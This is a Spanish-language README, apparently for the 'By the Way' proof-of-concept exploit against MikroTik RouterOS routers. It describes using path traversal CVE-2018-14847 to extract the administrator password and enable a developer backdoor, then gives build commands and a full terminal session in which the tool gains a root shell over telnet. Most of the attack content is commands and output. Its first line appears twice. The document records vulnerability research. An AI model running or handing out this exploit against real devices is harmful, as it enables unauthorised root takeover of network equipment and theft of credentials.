
By the Way es un exploit que permite obtener un shell de root en dispositivos Mikrotik que ejecutan versiones de RouterOS:
By the Way es un exploit que permite obtener una shell de root en dispositivos Mikrotik que ejecutan versiones de RouterOS:
El exploit aprovecha la vulnerabilidad de path traversal CVE-2018-14847 para extraer la contraseña del administrador y crear un paquete "option" que habilita la puerta trasera del desarrollador. Tras la explotación, el atacante puede conectarse por Telnet o SSH usando el usuario root "devel" con la contraseña del administrador.
Mikrotik parcheó CVE-2018-14847 en abril. Sin embargo, hasta que se escribió este PoC, creo que no se ha divulgado públicamente que el ataque puede aprovecharse para escribir archivos. Puedes encontrar el aviso de Mikrotik aquí:
Ten en cuenta que, aunque este exploit está escrito para Winbox, podría portarse a HTTP siempre que tuvieras conocimiento previo de las credenciales del administrador.
Este PoC requiere:
mkdir build
cd build
cmake ..
make
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.